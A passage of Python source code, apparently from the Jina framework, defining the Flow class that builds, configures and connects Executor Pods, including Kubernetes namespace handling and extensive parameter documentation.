class FlowType(type(ExitStack), type(JAMLCompatible)):
"""Type of Flow, metaclass of :class:`BaseFlow`"""
pass
_regex_port = r'(.*?):([0-9]{1,4}|[1-5][0-9]{4}|6[0-4][0-9]{3}|65[0-4][0-9]{2}|655[0-2][0-9]|6553[0-5])$'
if False:
from ..executors import BaseExecutor
from ..clients.base import BaseClient
from .asyncio import AsyncFlow
GATEWAY_NAME = 'gateway'
FALLBACK_PARSERS = [
set_gateway_parser(),
set_pod_parser(),
set_client_cli_parser(),
set_flow_parser(),
]
class Flow(PostMixin, JAMLCompatible, ExitStack, metaclass=FlowType):
"""Flow is how Jina streamlines and distributes Executors. """
class _FlowK8sInfraResourcesManager:
def __init__(self, k8s_namespace: str, k8s_custom_resource_dir: Optional[str]):
self.k8s_namespace = k8s_namespace
self.k8s_custom_resource_dir = k8s_custom_resource_dir
self.namespace_created = False
def __enter__(self):
from ..peapods.pods.k8slib import kubernetes_tools, kubernetes_client
client = kubernetes_client.K8sClients().core_v1
list_namespaces = [
item.metadata.name for item in client.list_namespace().items
]
if self.k8s_namespace not in list_namespaces:
with JinaLogger(f'create_{self.k8s_namespace}') as logger:
logger.info(f'🏝️\tCreate Namespace "{self.k8s_namespace}"')
kubernetes_tools.create(
'namespace',
{'name': self.k8s_namespace},
logger=logger,
custom_resource_dir=self.k8s_custom_resource_dir,
)
self.namespace_created = True
def __exit__(self, exc_type, exc_val, exc_tb):
from ..peapods.pods.k8slib import kubernetes_client
if self.namespace_created:
client = kubernetes_client.K8sClients().core_v1
client.delete_namespace(name=self.k8s_namespace)
# overload_inject_start_client_flow
@overload
def __init__(
self,
*,
asyncio: Optional[bool] = False,
host: Optional[str] = '0.0.0.0',
https: Optional[bool] = False,
port: Optional[int] = None,
protocol: Optional[str] = 'GRPC',
proxy: Optional[bool] = False,
**kwargs,
):
"""Create a Flow. Flow is how Jina streamlines and scales Executors. This overloaded method provides arguments from `jina client` CLI.
:param asyncio: If set, then the input and output of this Client work in an asynchronous manner.
:param host: The host address of the runtime, by default it is 0.0.0.0.
:param https: If set, connect to gateway using https
:param port: The port of the Gateway, which the client should connect to.
:param protocol: Communication protocol between server and client.
:param proxy: If set, respect the http_proxy and https_proxy environment variables. otherwise, it will unset these proxy variables before start. gRPC seems to prefer no proxy
.. # noqa: DAR202
.. # noqa: DAR101
.. # noqa: DAR003
"""
# overload_inject_end_client_flow
# overload_inject_start_gateway_flow
@overload
def __init__(
self,
*,
compress: Optional[str] = 'NONE',
compress_min_bytes: Optional[int] = 1024,
compress_min_ratio: Optional[float] = 1.1,
cors: Optional[bool] = False,
ctrl_with_ipc: Optional[bool] = True,
daemon: Optional[bool] = False,
default_swagger_ui: Optional[bool] = False,
description: Optional[str] = None,
env: Optional[dict] = None,
expose_endpoints: Optional[str] = None,
expose_public: Optional[bool] = False,
host: Optional[str] = '0.0.0.0',
host_in: Optional[str] = '0.0.0.0',
host_out: Optional[str] = '0.0.0.0',
hosts_in_connect: Optional[List[str]] = None,
log_config: Optional[str] = None,
memory_hwm: Optional[int] = -1,
name: Optional[str] = 'gateway',
native: Optional[bool] = False,
no_crud_endpoints: Optional[bool] = False,
no_debug_endpoints: Optional[bool] = False,
on_error_strategy: Optional[str] = 'IGNORE',
port_ctrl: Optional[int] = None,
port_expose: Optional[int] = None,
port_in: Optional[int] = None,
port_out: Optional[int] = None,
prefetch: Optional[int] = 0,
protocol: Optional[str] = 'GRPC',
proxy: Optional[bool] = False,
py_modules: Optional[List[str]] = None,
quiet: Optional[bool] = False,
quiet_error: Optional[bool] = False,
replicas: Optional[int] = 1,
runs_in_docker: Optional[bool] = False,
runtime_backend: Optional[str] = 'PROCESS',
runtime_cls: Optional[str] = 'GRPCRuntime',
shards: Optional[int] = 1,
socket_in: Optional[str] = 'PULL_CONNECT',
socket_out: Optional[str] = 'PUSH_CONNECT',
ssh_keyfile: Optional[str] = None,
ssh_password: Optional[str] = None,
ssh_server: Optional[str] = None,
static_routing_table: Optional[bool] = False,
timeout_ctrl: Optional[int] = 5000,
timeout_ready: Optional[int] = 600000,
title: Optional[str] = None,
uses: Optional[Union[str, Type['BaseExecutor'], dict]] = 'BaseExecutor',
uses_metas: Optional[dict] = None,
uses_requests: Optional[dict] = None,
uses_with: Optional[dict] = None,
uvicorn_kwargs: Optional[dict] = None,
workspace: Optional[str] = None,
zmq_identity: Optional[str] = None,
**kwargs,
):
"""Create a Flow. Flow is how Jina streamlines and scales Executors. This overloaded method provides arguments from `jina gateway` CLI.
:param compress: The compress algorithm used over the entire Flow.
Note that this is not necessarily effective,
it depends on the settings of `--compress-min-bytes` and `compress-min-ratio`
:param compress_min_bytes: The original message size must be larger than this number to trigger the compress algorithm, -1 means disable compression.
:param compress_min_ratio: The compression ratio (uncompressed_size/compressed_size) must be higher than this number to trigger the compress algorithm.
:param cors: If set, a CORS middleware is added to FastAPI frontend to allow cross-origin access.
:param ctrl_with_ipc: If set, use ipc protocol for control socket
:param daemon: The Pea attempts to terminate all of its Runtime child processes/threads on existing. setting it to true basically tell the Pea do not wait on the Runtime when closing
:param default_swagger_ui: If set, the default swagger ui is used for `/docs` endpoint.
:param description: The description of this HTTP server. It will be used in automatics docs such as Swagger UI.
:param env: The map of environment variables that are available inside runtime
:param expose_endpoints: A JSON string that represents a map from executor endpoints (`@requests(on=...)`) to HTTP endpoints.
:param expose_public: If set, expose the public IP address to remote when necessary, by default it exposesprivate IP address, which only allows accessing under the same network/subnet. Important to set this to true when the Pea will receive input connections from remote Peas
:param host: The host address of the runtime, by default it is 0.0.0.0.
:param host_in: The host address for input, by default it is 0.0.0.0
:param host_out: The host address for output, by default it is 0.0.0.0
:param hosts_in_connect: The host address for input, by default it is 0.0.0.0
:param log_config: The YAML config of the logger used in this object.
:param memory_hwm: The memory high watermark of this pod in Gigabytes, pod will restart when this is reached. -1 means no restriction
:param name: The name of this object.
This will be used in the following places:
- how you refer to this object in Python/YAML/CLI
- visualization
- log message header
- ...
When not given, then the default naming strategy will apply.
:param native: If set, only native Executors is allowed, and the Executor is always run inside ZEDRuntime.
:param no_crud_endpoints: If set, /index, /search, /update, /delete endpoints are removed from HTTP interface.
Any executor that has `@requests(on=...)` bind with those values will receive data requests.
:param no_debug_endpoints: If set, /status /post endpoints are removed from HTTP interface.
:param on_error_strategy: The skip strategy on exceptions.
- IGNORE: Ignore it, keep running all Executors in the sequel flow
- SKIP_HANDLE: Skip all Executors in the sequel, only `pre_hook` and `post_hook` are called
- THROW_EARLY: Immediately throw the exception, the sequel flow will not be running at all
Note, `IGNORE`, `SKIP_EXECUTOR` and `SKIP_HANDLE` do not guarantee the success execution in the sequel flow. If something
is wrong in the upstream, it is hard to carry this exception and moving forward without any side-effect.
:param port_ctrl: The port for controlling the runtime, default a random port between [49152, 65535]
:param port_expose: The port that the gateway exposes for clients for GRPC connections.
:param port_in: The port for input data, default a random port between [49152, 65535]
:param port_out: The port for output data, default a random port between [49152, 65535]
:param prefetch: Number of requests fetched from the client before feeding into the first Executor.
Used to control the speed of data input into a Flow. 0 disables prefetch (disabled by default)
:param protocol: Communication protocol between server and client.
:param proxy: If set, respect the http_proxy and https_proxy environment variables. otherwise, it will unset these proxy variables before start. gRPC seems to prefer no proxy
:param py_modules: The customized python modules need to be imported before loading the executor
Note that the recommended way is to only import a single module - a simple python file, if your
executor can be defined in a single file, or an ``__init__.py`` file if you have multiple files,
which should be structured as a python package. For more details, please see the
`Executor cookbook <https://docs.jina.ai/fundamentals/executor/repository-structure/>`__
:param quiet: If set, then no log will be emitted from this object.
:param quiet_error: If set, then exception stack information will not be added to the log
:param replicas: The number of replicas in the pod, `port_in` and `port_out` will be set to random, and routers will be added automatically when necessary
:param runs_in_docker: Informs a Pea that runs in a container. Important to properly set networking information
:param runtime_backend: The parallel backend of the runtime inside the Pea
:param runtime_cls: The runtime class to run inside the Pea
:param shards: The number of shards in the pod running at the same time, `port_in` and `port_out` will be set to random, and routers will be added automatically when necessary. For more details check https://docs.jina.ai/fundamentals/flow/topology/
:param socket_in: The socket type for input port
:param socket_out: The socket type for output port
:param ssh_keyfile: This specifies a key to be used in ssh login, default None. regular default ssh keys will be used without specifying this argument.
:param ssh_password: The ssh password to the ssh server.
:param ssh_server: The SSH server through which the tunnel will be created, can actually be a fully specified `user@server:port` ssh url.
:param static_routing_table: Defines if the routing table should be pre computed by the Flow. In this case it is statically defined for each Pod and not send on every data request. Can not be used in combination with external pods
:param timeout_ctrl: The timeout in milliseconds of the control request, -1 for waiting forever
:param timeout_ready: The timeout in milliseconds of a Pea waits for the runtime to be ready, -1 for waiting forever
:param title: The title of this HTTP server. It will be used in automatics docs such as Swagger UI.
:param uses: The config of the executor, it could be one of the followings:
* an Executor YAML file (.yml, .yaml, .jaml)
* a Jina Hub Executor (must start with `jinahub://` or `jinahub+docker://`)
* a docker image (must start with `docker://`)
* the string literal of a YAML config (must start with `!` or `jtype: `)
* the string literal of a JSON config
When use it under Python, one can use the following values additionally:
- a Python dict that represents the config
- a text file stream has `.read()` interface
:param uses_metas: Dictionary of keyword arguments that will override the `metas` configuration in `uses`
:param uses_requests: Dictionary of keyword arguments that will override the `requests` configuration in `uses`
:param uses_with: Dictionary of keyword arguments that will override the `with` configuration in `uses`
:param uvicorn_kwargs: Dictionary of kwargs arguments that will be passed to Uvicorn server when starting the server
More details can be found in Uvicorn docs: https://www.uvicorn.org/settings/
:param workspace: The working directory for any IO operations in this object. If not set, then derive from its parent `workspace`.
:param zmq_identity: The identity of a ZMQRuntime. It is used for unique socket identification towards other ZMQRuntimes.
.. # noqa: DAR202
.. # noqa: DAR101
.. # noqa: DAR003
"""
# overload_inject_end_gateway_flow
# overload_inject_start_flow
@overload
def __init__(
self,
*,
env: Optional[dict] = None,
inspect: Optional[str] = 'COLLECT',
log_config: Optional[str] = None,
name: Optional[str] = None,
quiet: Optional[bool] = False,
quiet_error: Optional[bool] = False,
static_routing_table: Optional[bool] = False,
uses: Optional[str] = None,
workspace: Optional[str] = './',
**kwargs,
):
"""Create a Flow. Flow is how Jina streamlines and scales Executors. This overloaded method provides arguments from `jina flow` CLI.
:param env: The map of environment variables that are available inside runtime
:param inspect: The strategy on those inspect pods in the flow.
If `REMOVE` is given then all inspect pods are removed when building the flow.
:param log_config: The YAML config of the logger used in this object.
:param name: The name of this object.
This will be used in the following places:
- how you refer to this object in Python/YAML/CLI
- visualization
- log message header
- ...
When not given, then the default naming strategy will apply.
:param quiet: If set, then no log will be emitted from this object.
:param quiet_error: If set, then exception stack information will not be added to the log
:param static_routing_table: Defines if the routing table should be pre computed by the Flow. In this case it is statically defined for each Pod and not send on every data request. Can not be used in combination with external pods
:param uses: The YAML file represents a flow
:param workspace: The working directory for any IO operations in this object. If not set, then derive from its parent `workspace`.
.. # noqa: DAR202
.. # noqa: DAR101
.. # noqa: DAR003
"""
# overload_inject_end_flow
def __init__(
self,
args: Optional['argparse.Namespace'] = None,
**kwargs,
):
super().__init__()
self._version = '1' #: YAML version number, this will be later overridden if YAML config says the other way
self._pod_nodes = OrderedDict() # type: Dict[str, Pod]
self._inspect_pods = {} # type: Dict[str, str]
self._endpoints_mapping = {} # type: Dict[str, Dict]
self._build_level = FlowBuildLevel.EMPTY
self._last_changed_pod = [
GATEWAY_NAME
] #: default first pod is gateway, will add when build()
self._update_args(args, **kwargs)
self.k8s_infrastructure_manager = None
if self.args.infrastructure == InfrastructureType.K8S:
self.k8s_infrastructure_manager = self._FlowK8sInfraResourcesManager(
k8s_namespace=self.args.name,
k8s_custom_resource_dir=getattr(
self.args, 'k8s_custom_resource_dir', None
),
)
if isinstance(self.args, argparse.Namespace):
self.logger = JinaLogger(
self.__class__.__name__, **vars(self.args), **self._common_kwargs
)
else:
self.logger = JinaLogger(self.__class__.__name__, **self._common_kwargs)
def _update_args(self, args, **kwargs):
from ..parsers.flow import set_flow_parser
from ..helper import ArgNamespace
_flow_parser = set_flow_parser()
if args is None:
args = ArgNamespace.kwargs2namespace(
kwargs, _flow_parser, True, fallback_parsers=FALLBACK_PARSERS
)
self.args = args
# common args should be the ones that can not be parsed by _flow_parser
known_keys = vars(args)
self._common_kwargs = {k: v for k, v in kwargs.items() if k not in known_keys}
self._kwargs = ArgNamespace.get_non_defaults_args(
args, _flow_parser
) #: for yaml dump
if self._common_kwargs.get('asyncio', False) and not isinstance(
self, AsyncPostMixin
):
from .asyncio import AsyncFlow
self.__class__ = AsyncFlow
@staticmethod
def _parse_endpoints(op_flow, pod_name, endpoint, connect_to_last_pod=False) -> Set:
# parsing needs
if isinstance(endpoint, str):
endpoint = [endpoint]
elif not endpoint:
if op_flow._last_changed_pod and connect_to_last_pod:
endpoint = [op_flow.last_pod]
else:
endpoint = []
if isinstance(endpoint, (list, tuple)):
for idx, s in enumerate(endpoint):
if s == pod_name:
raise FlowTopologyError(
'the income/output of a pod can not be itself'
)
else:
raise ValueError(f'endpoint={endpoint} is not parsable')
# if an endpoint is being inspected, then replace it with inspected Pod
endpoint = set(op_flow._inspect_pods.get(ep, ep) for ep in endpoint)
return endpoint
@property
def last_pod(self):
"""Last pod
.. # noqa: DAR401
.. # noqa: DAR201
"""
return self._last_changed_pod[-1]
@last_pod.setter
def last_pod(self, name: str):
"""
Set a Pod as the last Pod in the Flow, useful when modifying the Flow.
.. # noqa: DAR401
:param name: the name of the existing Pod
"""
if name not in self._pod_nodes:
raise FlowMissingPodError(f'{name} can not be found in this Flow')
if self._last_changed_pod and name == self.last_pod:
pass
else:
self._last_changed_pod.append(name)
# graph is now changed so we need to
# reset the build level to the lowest
self._build_level = FlowBuildLevel.EMPTY
@allowed_levels([FlowBuildLevel.EMPTY])
def _add_gateway(self, needs, **kwargs):
kwargs.update(
dict(
name=GATEWAY_NAME,
ctrl_with_ipc=True, # otherwise ctrl port would be conflicted
host=self.host,
protocol=self.protocol,
port_expose=self.port_expose,
pod_role=PodRoleType.GATEWAY,
expose_endpoints=json.dumps(self._endpoints_mapping),
k8s_namespace=self.args.name,
)
)
kwargs.update(self._common_kwargs)
args = ArgNamespace.kwargs2namespace(kwargs, set_gateway_parser())
args.k8s_namespace = self.args.name
args.connect_to_predecessor = False
args.noblock_on_start = True
self._pod_nodes[GATEWAY_NAME] = PodFactory.build_pod(
args, needs, self.args.infrastructure
)
@allowed_levels([FlowBuildLevel.EMPTY])
def needs(
self, needs: Union[Tuple[str], List[str]], name: str = 'joiner', *args, **kwargs
) -> 'Flow':
"""
Add a blocker to the Flow, wait until all peas defined in **needs** completed.
.. # noqa: DAR401
:param needs: list of service names to wait
:param name: the name of this joiner, by default is ``joiner``
:param args: additional positional arguments forwarded to the add function
:param kwargs: additional key value arguments forwarded to the add function
:return: the modified Flow
"""
if len(needs) <= 1:
raise FlowTopologyError(
'no need to wait for a single service, need len(needs) > 1'
)
return self.add(
name=name, needs=needs, pod_role=PodRoleType.JOIN, *args, **kwargs
)
def needs_all(self, name: str = 'joiner', *args, **kwargs) -> 'Flow':
"""
Collect all hanging Pods so far and add a blocker to the Flow; wait until all handing peas completed.
:param name: the name of this joiner (default is ``joiner``)
:param args: additional positional arguments which are forwarded to the add and needs function
:param kwargs: additional key value arguments which are forwarded to the add and needs function
:return: the modified Flow
"""
needs = _hanging_pods(self)
if len(needs) == 1:
return self.add(name=name, needs=needs, *args, **kwargs)
return self.needs(name=name, needs=needs, *args, **kwargs)
# overload_inject_start_pod
@overload
def add(
self,
*,
connect_to_predecessor: Optional[bool] = False,
ctrl_with_ipc: Optional[bool] = False,
daemon: Optional[bool] = False,
docker_kwargs: Optional[dict] = None,
entrypoint: Optional[str] = None,
env: Optional[dict] = None,
expose_public: Optional[bool] = False,
external: Optional[bool] = False,
force: Optional[bool] = False,
gpus: Optional[str] = None,
host: Optional[str] = '0.0.0.0',
host_in: Optional[str] = '0.0.0.0',
host_out: Optional[str] = '0.0.0.0',
hosts_in_connect: Optional[List[str]] = None,
install_requirements: Optional[bool] = False,
log_config: Optional[str] = None,
memory_hwm: Optional[int] = -1,
name: Optional[str] = None,
native: Optional[bool] = False,
on_error_strategy: Optional[str] = 'IGNORE',
peas_hosts: Optional[List[str]] = None,
polling: Optional[str] = 'ANY',
port_ctrl: Optional[int] = None,
port_in: Optional[int] = None,
port_jinad: Optional[int] = 8000,
port_out: Optional[int] = None,
pull_latest: Optional[bool] = False,
py_modules: Optional[List[str]] = None,
quiet: Optional[bool] = False,
quiet_error: Optional[bool] = False,
quiet_remote_logs: Optional[bool] = False,
replicas: Optional[int] = 1,
runs_in_docker: Optional[bool] = False,
runtime_backend: Optional[str] = 'PROCESS',
runtime_cls: Optional[str] = 'ZEDRuntime',
scheduling: Optional[str] = 'LOAD_BALANCE',
shards: Optional[int] = 1,
socket_in: Optional[str] = 'PULL_BIND',
socket_out: Optional[str] = 'PUSH_BIND',
ssh_keyfile: Optional[str] = None,
ssh_password: Optional[str] = None,
ssh_server: Optional[str] = None,
static_routing_table: Optional[bool] = False,
timeout_ctrl: Optional[int] = 5000,
timeout_ready: Optional[int] = 600000,
upload_files: Optional[List[str]] = None,
uses: Optional[Union[str, Type['BaseExecutor'], dict]] = 'BaseExecutor',
uses_after: Optional[Union[str, Type['BaseExecutor'], dict]] = None,
uses_before: Optional[Union[str, Type['BaseExecutor'], dict]] = None,
uses_metas: Optional[dict] = None,
uses_requests: Optional[dict] = None,
uses_with: Optional[dict] = None,
volumes: Optional[List[str]] = None,
workspace: Optional[str] = None,
zmq_identity: Optional[str] = None,
**kwargs,
) -> Union['Flow', 'AsyncFlow']:
"""Add an Executor to the current Flow object.
:param connect_to_predecessor: The head Pea of this Pod will connect to the TailPea of the predecessor Pod.
:param ctrl_with_ipc: If set, use ipc protocol for control socket
:param daemon: The Pea attempts to terminate all of its Runtime child processes/threads on existing. setting it to true basically tell the Pea do not wait on the Runtime when closing
:param docker_kwargs: Dictionary of kwargs arguments that will be passed to Docker SDK when starting the docker '
container.
More details can be found in the Docker SDK docs: https://docker-py.readthedocs.io/en/stable/
:param entrypoint: The entrypoint command overrides the ENTRYPOINT in Docker image. when not set then the Docker image ENTRYPOINT takes effective.
:param env: The map of environment variables that are available inside runtime
:param expose_public: If set, expose the public IP address to remote when necessary, by default it exposesprivate IP address, which only allows accessing under the same network/subnet. Important to set this to true when the Pea will receive input connections from remote Peas
:param external: The Pod will be considered an external Pod that has been started independently from the Flow.This Pod will not be context managed by the Flow.
:param force: If set, always pull the latest Hub Executor bundle even it exists on local
:param gpus: This argument allows dockerized Jina executor discover local gpu devices.
Note,
- To access all gpus, use `--gpus all`.
- To access multiple gpus, e.g. make use of 2 gpus, use `--gpus 2`.
- To access specified gpus based on device id, use `--gpus device=[YOUR-GPU-DEVICE-ID]`
- To access specified gpus based on multiple device id, use `--gpus device=[YOUR-GPU-DEVICE-ID1],device=[YOUR-GPU-DEVICE-ID2]`
- To specify more parameters, use `--gpus device=[YOUR-GPU-DEVICE-ID],runtime=nvidia,capabilities=display
:param host: The host address of the runtime, by default it is 0.0.0.0.
:param host_in: The host address for input, by default it is 0.0.0.0
:param host_out: The host address for output, by default it is 0.0.0.0
:param hosts_in_connect: The host address for input, by default it is 0.0.0.0
:param install_requirements: If set, install `requirements.txt` in the Hub Executor bundle to local
:param log_config: The YAML config of the logger used in this object.
:param memory_hwm: The memory high watermark of this pod in Gigabytes, pod will restart when this is reached. -1 means no restriction
:param name: The name of this object.
This will be used in the following places:
- how you refer to this object in Python/YAML/CLI
- visualization
- log message header
- ...
When not given, then the default naming strategy will apply.
:param native: If set, only native Executors is allowed, and the Executor is always run inside ZEDRuntime.
:param on_error_strategy: The skip strategy on exceptions.
- IGNORE: Ignore it, keep running all Executors in the sequel flow
- SKIP_HANDLE: Skip all Executors in the sequel, only `pre_hook` and `post_hook` are called
- THROW_EARLY: Immediately throw the exception, the sequel flow will not be running at all
Note, `IGNORE`, `SKIP_EXECUTOR` and `SKIP_HANDLE` do not guarantee the success execution in the sequel flow. If something
is wrong in the upstream, it is hard to carry this exception and moving forward without any side-effect.
:param peas_hosts: The hosts of the peas when shards greater than 1.
Peas will be evenly distributed among the hosts. By default,
peas are running on host provided by the argument ``host``
:param polling: The polling strategy of the Pod (when `shards>1`)
- ANY: only one (whoever is idle) Pea polls the message
- ALL: all Peas poll the message (like a broadcast)
:param port_ctrl: The port for controlling the runtime, default a random port between [49152, 65535]
:param port_in: The port for input data, default a random port between [49152, 65535]
:param port_jinad: The port of the remote machine for usage with JinaD.
:param port_out: The port for output data, default a random port between [49152, 65535]
:param pull_latest: Pull the latest image before running
:param py_modules: The customized python modules need to be imported before loading the executor
Note that the recommended way is to only import a single module - a simple python file, if your
executor can be defined in a single file, or an ``__init__.py`` file if you have multiple files,
which should be structured as a python package. For more details, please see the
`Executor cookbook <https://docs.jina.ai/fundamentals/executor/repository-structure/>`__
:param quiet: If set, then no log will be emitted from this object.
:param quiet_error: If set, then exception stack information will not be added to the log
:param quiet_remote_logs: Do not display the streaming of remote logs on local console
:param replicas: The number of replicas in the pod, `port_in` and `port_out` will be set to random, and routers will be added automatically when necessary
:param runs_in_docker: Informs a Pea that runs in a container. Important to properly set networking information
:param runtime_backend: The parallel backend of the runtime inside the Pea
:param runtime_cls: The runtime class to run inside the Pea
:param scheduling: The strategy of scheduling workload among Peas
:param shards: The number of shards in the pod running at the same time, `port_in` and `port_out` will be set to random, and routers will be added automatically when necessary. For more details check https://docs.jina.ai/fundamentals/flow/topology/
:param socket_in: The socket type for input port
:param socket_out: The socket type for output port
:param ssh_keyfile: This specifies a key to be used in ssh login, default None. regular default ssh keys will be used without specifying this argument.
:param ssh_password: The ssh password to the ssh server.
:param ssh_server: The SSH server through which the tunnel will be created, can actually be a fully specified `user@server:port` ssh url.
:param static_routing_table: Defines if the routing table should be pre computed by the Flow. In this case it is statically defined for each Pod and not send on every data request. Can not be used in combination with external pods
:param timeout_ctrl: The timeout in milliseconds of the control request, -1 for waiting forever
:param timeout_ready: The timeout in milliseconds of a Pea waits for the runtime to be ready, -1 for waiting forever
:param upload_files: The files on the host to be uploaded to the remote
workspace. This can be useful when your Pod has more
file dependencies beyond a single YAML file, e.g.
Python files, data files.
Note,
- currently only flatten structure is supported, which means if you upload `[./foo/a.py, ./foo/b.pp, ./bar/c.yml]`, then they will be put under the _same_ workspace on the remote, losing all hierarchies.
- by default, `--uses` YAML file is always uploaded.
- uploaded files are by default isolated across the runs. To ensure files are submitted to the same workspace across different runs, use `--workspace-id` to specify the workspace.
:param uses: The config of the executor, it could be one of the followings:
* an Executor YAML file (.yml, .yaml, .jaml)
* a Jina Hub Executor (must start with `jinahub://` or `jinahub+docker://`)
* a docker image (must start with `docker://`)
* the string literal of a YAML config (must start with `!` or `jtype: `)
* the string literal of a JSON config
When use it under Python, one can use the following values additionally:
- a Python dict that represents the config
- a text file stream has `.read()` interface
:param uses_after: The executor attached after the Peas described by --uses, typically used for receiving from all shards, accepted type follows `--uses`
:param uses_before: The executor attached after the Peas described by --uses, typically before sending to all shards, accepted type follows `--uses`
:param uses_metas: Dictionary of keyword arguments that will override the `metas` configuration in `uses`
:param uses_requests: Dictionary of keyword arguments that will override the `requests` configuration in `uses`
:param uses_with: Dictionary of keyword arguments that will override the `with` configuration in `uses`
:param volumes: The path on the host to be mounted inside the container.
Note,
- If separated by `:`, then the first part will be considered as the local host path and the second part is the path in the container system.
- If no split provided, then the basename of that directory will be mounted into container's root path, e.g. `--volumes="/user/test/my-workspace"` will be mounted into `/my-workspace` inside the container.
- All volumes are mounted with read-write mode.
:param workspace: The working directory for any IO operations in this object. If not set, then derive from its parent `workspace`.
:param zmq_identity: The identity of a ZMQRuntime. It is used for unique socket identification towards other ZMQRuntimes.
:return: a (new) Flow object with modification
.. # noqa: DAR202
.. # noqa: DAR101
.. # noqa: DAR003
"""
# overload_inject_end_pod
@allowed_levels([FlowBuildLevel.EMPTY])
def add(
self,
*,
needs: Optional[Union[str, Tuple[str], List[str]]] = None,
copy_flow: bool = True,
pod_role: 'PodRoleType' = PodRoleType.POD,
**kwargs,
) -> 'Flow':
"""
Add a Pod to the current Flow object and return the new modified Flow object.
The attribute of the Pod can be later changed with :py:meth:`set` or deleted with :py:meth:`remove`
.. # noqa: DAR401
:param needs: the name of the Pod(s) that this Pod receives data from.
One can also use 'gateway' to indicate the connection with the gateway.
:param pod_role: the role of the Pod, used for visualization and route planning
:param copy_flow: when set to true, then always copy the current Flow and do the modification on top of it then return, otherwise, do in-line modification
:param kwargs: other keyword-value arguments that the Pod CLI supports
:return: a (new) Flow object with modification
"""
op_flow = copy.deepcopy(self) if copy_flow else self
# pod naming logic
pod_name = kwargs.get('name', None)
if pod_name in op_flow._pod_nodes:
new_name = f'{pod_name}{len(op_flow._pod_nodes)}'
self.logger.debug(
f'"{pod_name}" is used in this Flow already! renamed it to "{new_name}"'
)
pod_name = new_name
if not pod_name:
pod_name = f'executor{len(op_flow._pod_nodes)}'
if not pod_name.isidentifier():
# hyphen - can not be used in the name
raise ValueError(
f'name: {pod_name} is invalid, please follow the python variable name conventions'
)
# needs logic
needs = op_flow._parse_endpoints(
op_flow, pod_name, needs, connect_to_last_pod=True
)
# set the kwargs inherit from `Flow(kwargs1=..., kwargs2=)`
for key, value in op_flow._common_kwargs.items():
if key not in kwargs:
kwargs[key] = value
# check if host is set to remote:port
if 'host' in kwargs:
m = re.match(_regex_port, kwargs['host'])
if (
kwargs.get('host', __default_host__) != __default_host__
and m
and 'port_jinad' not in kwargs
):
kwargs['port_jinad'] = m.group(2)
kwargs['host'] = m.group(1)
# update kwargs of this Pod
kwargs.update(dict(name=pod_name, pod_role=pod_role, num_part=len(needs)))
parser = set_pod_parser()
if pod_role == PodRoleType.GATEWAY:
parser = set_gateway_parser()
args = ArgNamespace.kwargs2namespace(
kwargs, parser, True, fallback_parsers=FALLBACK_PARSERS
)
# grpc data runtime does not support sharding at the moment
if (
args.grpc_data_requests
and kwargs.get('shards') is not None
and kwargs.get('shards', 1) > 1
and self.args.infrastructure != InfrastructureType.K8S
):
raise NotImplementedError("GRPC data runtime does not support sharding")
if args.grpc_data_requests and args.runtime_cls == 'ZEDRuntime':
args.runtime_cls = 'GRPCDataRuntime'
# pod workspace if not set then derive from flow workspace
args.workspace = os.path.abspath(args.workspace or self.workspace)
args.k8s_namespace = self.args.name
args.noblock_on_start = True
args.extra_search_paths = self.args.extra_search_paths
args.zmq_identity = None
# BACKWARDS COMPATIBILITY:
# We assume that this is used in a search Flow if replicas and shards are used
# Thus the polling type should be all
# But dont override any user provided polling
if args.replicas > 1 and args.shards > 1 and 'polling' not in kwargs:
args.polling = PollingType.ALL
op_flow._pod_nodes[pod_name] = PodFactory.build_pod(
args, needs, self.args.infrastructure
)
op_flow.last_pod = pod_name
return op_flow
@allowed_levels([FlowBuildLevel.EMPTY])
def inspect(self, name: str = 'inspect', *args, **kwargs) -> 'Flow':
"""Add an inspection on the last changed Pod in the Flow
Internally, it adds two Pods to the Flow. But don't worry, the overhead is minimized and you
can remove them by simply using `Flow(inspect=FlowInspectType.REMOVE)` before using the Flow.
.. highlight:: bash
.. code-block:: bash
Flow -- PUB-SUB -- BasePod(_pass) -- Flow
|
-- PUB-SUB -- InspectPod (Hanging)
In this way, :class:`InspectPod` looks like a simple ``_pass`` from outside and
does not introduce side-effects (e.g. changing the socket type) to the original Flow.
The original incoming and outgoing socket types are preserved.
This function is very handy for introducing an Evaluator into the Flow.
.. seealso::
:meth:`gather_inspect`
:param name: name of the Pod
:param args: args for .add()
:param kwargs: kwargs for .add()
:return: the new instance of the Flow
"""
_last_pod = self.last_pod
op_flow = self.add(
name=name, needs=_last_pod, pod_role=PodRoleType.INSPECT, *args, **kwargs
)
# now remove uses and add an auxiliary Pod
if 'uses' in kwargs:
kwargs.pop('uses')
op_flow = op_flow.add(
name=f'_aux_{name}',
needs=_last_pod,
pod_role=PodRoleType.INSPECT_AUX_PASS,
*args,
**kwargs,
)
# register any future connection to _last_pod by the auxiliary Pod
op_flow._inspect_pods[_last_pod] = op_flow.last_pod
return op_flow
@allowed_levels([FlowBuildLevel.EMPTY])
def gather_inspect(
self,
name: str = 'gather_inspect',
include_last_pod: bool = True,
*args,
**kwargs,
) -> 'Flow':
"""Gather all inspect Pods output into one Pod. When the Flow has no inspect Pod then the Flow itself
is returned.
.. note::
If ``--no-inspect`` is **not** given, then :meth:`gather_inspect` is auto called before :meth:`build`. So
in general you don't need to manually call :meth:`gather_inspect`.
:param name: the name of the gather Pod
:param include_last_pod: if to include the last modified Pod in the Flow
:param args: args for .add()
:param kwargs: kwargs for .add()
:return: the modified Flow or the copy of it
.. seealso::
:meth:`inspect`
"""
needs = [k for k, v in self._pod_nodes.items() if v.role == PodRoleType.INSPECT]
if needs:
if include_last_pod:
needs.append(self.last_pod)
return self.add(
name=name,
needs=needs,
pod_role=PodRoleType.JOIN_INSPECT,
*args,
**kwargs,
)
else:
# no inspect node is in the graph, return the current graph
return self
def _get_gateway_target(self, prefix):
gateway_pod = self._pod_nodes[GATEWAY_NAME]
return (
f'{prefix}-{GATEWAY_NAME}',
{
'host': gateway_pod.head_host,
'port': gateway_pod.head_port_in,
'expected_parts': 0,
},
)
# TODO needs to be refactored - deployment should not be a dictionary. Related Ticket:
# https://github.com/jina-ai/jina/issues/3280
def _get_routing_table(self) -> RoutingTable:
graph = RoutingTable()
for pod_id, pod in self._pod_nodes.items():
if pod_id == GATEWAY_NAME:
deployment = pod.deployments[0]
graph.add_pod(
f'start-{GATEWAY_NAME}',
deployment['head_host'],
deployment['head_port_in'],
deployment['tail_port_out'],
deployment['head_zmq_identity'],
)
graph.add_pod(
f'end-{GATEWAY_NAME}',
deployment['head_host'],
deployment['head_port_in'],
deployment['tail_port_out'],
deployment['head_zmq_identity'],
)
else:
